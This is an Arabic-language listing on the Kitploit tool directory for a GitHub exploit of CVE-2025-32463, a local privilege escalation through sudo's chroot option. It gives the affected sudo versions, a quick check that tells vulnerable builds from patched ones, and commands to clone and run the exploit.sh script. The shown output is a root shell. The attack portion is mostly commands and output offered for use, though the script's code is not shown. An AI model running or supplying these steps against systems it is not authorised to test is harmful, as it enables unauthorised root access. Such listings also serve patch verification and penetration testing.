Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-32463 — هذا هو الاستغلال الخاص بـ CVE-2025-32463 | Kitploit
أدوات/GitHubGitHub/rajneeshkarya/cve-2025-32463
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالاختبار الاختراقالفريق الأحمر
GitHubrajneeshkarya/cve-2025-32463

CVE-2025-32463

هذا هو الاستغلال الخاص بـ CVE-2025-32463

عرض المستودع
11منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال CVE-2025-32463

هذا هو استغلال CVE-2025-32463

  • شكرًا لـ Rich Mirch (@0xm1rch على X) من Stratascale على الإبلاغ عن هذه الثغرة المذهلة.
  • المنشور الأصلي: Vulnerability Advisory: Sudo chroot Elevation of Privilege
  • NVD: CVE-2025-32463 (CVSS 9.3)

الإصدارات المتأثرة

البنى القابلة للاستغلال من sudo 1.9.14 حتى 1.9.17 (جميع مراجعات p) في معظم توزيعات Linux متأثرة.

صفحات الأمان

  • Ubuntu (CVSS 9.3)
  • Redhat (CVSS 7.8)
  • SUSE (CVSS 7.8)
  • Debian

فحص سريع للثغرة

root@kitploit:~
# Vulnerable sudo will give you this
kairaj5456 ~ $ sudo -R fake_root fake_root
sudo: fake_root: No such file or directory

# Patched sudo will give you this
kairaj5456 ~ $ sudo -R fake_root fake_root
[sudo] password for kairaj5456:
sudo: you are not permitted to use the -R option with fake_root

اختبار الاستغلال

root@kitploit:~
$ git clone https://github.com/Rajneeshkarya/CVE-2025-32463.git

$ cd CVE-2025-32463

$ chmod +x exploit.sh

$ ./exploit.sh

[+] Launching exploit via sudo...

# id
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),117(bluetooth),121(wireshark),129(scanner),136(kaboxer),1000(kairaj5456)

لفهم الثغرة

اطّلع على المدونة الأصلية التي نشرها Rich Mirch - انقر هنا

تنزيل الأداة